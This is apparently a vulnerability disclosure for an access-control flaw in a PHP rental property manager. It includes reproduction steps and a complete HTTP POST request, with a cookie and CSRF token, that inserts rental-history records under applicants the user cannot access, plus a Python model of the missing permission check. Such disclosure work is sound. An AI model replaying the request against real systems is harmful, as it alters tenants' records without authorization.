Improper Privilege Management in bigprof-software/online-rental-property-manager
Reported on
Jul 3rd 2021
💥 BUG
Privilege escalation bug: a residence_and_rental record can be added to an applicant by a user without access to applicants.
💥 IMPACT
An unprivileged user can add a residence_and_rental record to an applicant.
💥 STEPS TO REPRODUCE
1. From the admin account, go to http://localhost/online-rental/app/admin/pageViewMembers.php and add a new user called user-B.
Now revoke all access to the Applicants and Tenants module for user-B, so user-B can't view/edit/create/delete any applicant.
2. Now go to the admin account and add a new applicant. Let's assume the applicant id is 1.
3. Now go to the user-B account and send the request below to add a residence_and_rental record to the above applicant.
POST /online-rental/app/residence_and_rental_history_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------359396311723915903184220116124
Content-Length: 3337
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/residence_and_rental_history_view.php?filterer_tenant=1&addNew_x=1&Embedded=1
Cookie: rental_property_manager=8qh2ouu3163e1bjr6f25i45c51;
Upgrade-Insecure-Requests: 1
Account: test2
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="Embedded"
1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="csrf_token"
a21d69a86030e40629ee0be7c5920f08
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="filterer_tenant"
1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="current_view"
DV
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SortField"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SelectedID"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SelectedField"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SortDirection"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="FirstRecord"
1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="NoDV"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="PrintDV"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="tenant"
1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="address"
by_user2
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="landlord_or_manager_name"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="landlord_or_manager_phone"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="monthly_rent"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="duration_of_residency_fromMonth"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="duration_of_residency_fromDay"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="duration_of_residency_fromYear"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="toMonth"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="toDay"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="toYear"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="reason_for_leaving"
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="notes"
by_user<br>
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="insert_x"
1
-----------------------------359396311723915903184220116124
Content-Disposition: form-data; name="SearchString"
-----------------------------359396311723915903184220116124--
In this request, change the applicant id value to the id of the applicant created above, and a new residence_and_rental record will be added to that applicant.
So, user-B doesn't have any access to the applicant module but can still add residence_and_rental records to any applicant.
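The root cause is that the child-record insert only checks the caller's rights on the residence_and_rental table, not on the applicant it points at. The following is an added model of the missing check, written for this report and not taken from the project's code; the table names, permission actions and user setup are assumptions that mirror the scenario above.

```python
from dataclasses import dataclass, field

# Assumed table names modelling the two modules in the report; not the project's own identifiers.
PARENT_TABLE = "applicants_and_tenants"
CHILD_TABLE = "residence_and_rental_history"


@dataclass
class User:
    name: str
    perms: dict = field(default_factory=dict)  # table -> set of granted actions

    def can(self, table: str, action: str) -> bool:
        return action in self.perms.get(table, set())


def handle_insert(user: User, form: dict, db: dict) -> bool:
    """Process an insert_x request for the child table.

    Returns True if a row was inserted. Authorization requires BOTH insert
    rights on the child table AND view access to the parent record named by
    the `tenant` field; the second check is the one the report shows missing.
    """
    if form.get("insert_x") != "1" or not user.can(CHILD_TABLE, "insert"):
        return False
    try:
        parent_id = int(form["tenant"])
    except (KeyError, ValueError):
        return False  # no usable parent id: refuse rather than insert an orphan
    if not user.can(PARENT_TABLE, "view") or parent_id not in db[PARENT_TABLE]:
        return False  # caller may not see this applicant, so may not attach records to it
    db[CHILD_TABLE].append({"tenant": parent_id,
                            "address": form.get("address", ""),
                            "notes": form.get("notes", "")})
    return True


def demo() -> dict:
    """Constructed scenario mirroring the report: admin has full access,
    user-B keeps child-table rights but has no access to Applicants and Tenants."""
    db = {PARENT_TABLE: {1: {"name": "applicant-1"}}, CHILD_TABLE: []}
    full = {"view", "insert", "edit", "delete"}
    admin = User("admin", {PARENT_TABLE: set(full), CHILD_TABLE: set(full)})
    user_b = User("user-B", {CHILD_TABLE: {"view", "insert"}})
    form = {"insert_x": "1", "tenant": "1", "address": "by_user2", "notes": "by_user"}
    return {
        "user-B": handle_insert(user_b, form, db),  # False: blocked by the parent check
        "admin": handle_insert(admin, form, db),    # True
        "records": len(db[CHILD_TABLE]),            # 1
    }
```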